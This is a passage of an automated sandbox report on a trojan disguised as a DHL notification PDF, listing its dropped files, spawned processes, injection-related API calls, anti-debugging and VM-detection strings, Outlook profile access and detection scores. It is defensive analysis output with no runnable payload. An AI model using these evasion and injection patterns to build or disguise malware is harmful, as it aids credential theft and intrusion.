Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A595D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A598A0 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59820 NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A5B040 NtSuspendThread,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A599D0 NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59950 NtQueueApcThread,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59A80 NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59A10 NtQuerySection,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A5A3B0 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59B00 NtSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A595F0 NtQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59520 NtWaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A5AD30 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59560 NtWriteFile,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A596D0 NtCreateKey,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59610 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59670 NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59650 NtQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59730 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A5A710 NtOpenProcessToken,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59760 NtOpenProcess,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59770 NtSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A5A770 NtOpenThread,
Source: DHL_Notification_pdf.exe | ReversingLabs: Detection: 53%
Source: DHL_Notification_pdf.exe | Virustotal: Detection: 46%
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | File read: C:\Users\user\Desktop\DHL_Notification_pdf.exe
Source: DHL_Notification_pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\DHL_Notification_pdf.exe C:\Users\user\Desktop\DHL_Notification_pdf.exe
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe "C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | File created: C:\Users\user~1\AppData\Local\Temp\nsw10F4.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@8/5@12/7
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_004021AA CoCreateInstance,
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Command line argument: A
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\cmmon32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\cmmon32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: DHL_Notification_pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: ldndbi.exe, 00000001.00000003.250768478.000000001A020000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000001.00000003.250473705.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ldndbi.exe, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Unpacked PE file: 3.2.ldndbi.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 1_2_00410AA4 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0041B1FB push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0040DAA5 push edi; retf
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0041B369 push es; retf
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00422C58 push dword ptr [057DC0C6h]; ret
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0041C4AA push ecx; retf
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0041BDCE push esp; ret
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00401DF0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00406F32 push C87026BFh; retf
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A6D0D1 push ecx; ret
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | File created: C:\Users\user\AppData\Local\Temp\ldndbi.exe
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 3384 | Thread sleep time: -38000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A46A60 rdtscp
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 877
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 870
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | API coverage: 9.3 %
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_0040699E FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_0040290B FindFirstFileW,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 1_2_004089F8 FindFirstFileExW,
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000003.463061661.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000002.517701971.0000000007B66000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.263500910.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1D
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
Source: explorer.exe, 00000004.00000000.259895150.0000000005EF4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cmmon32.exe, 00000005.00000002.509147113.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`p
Source: cmmon32.exe, 00000005.00000002.509147113.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.263500910.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}813
          Source: explorer.exe, 00000004.00000002.522931488.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.461873362.000000000F5CA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllate
          Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000004.00000002.514828788.0000000005F12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_0040B0AF GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A46A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h]
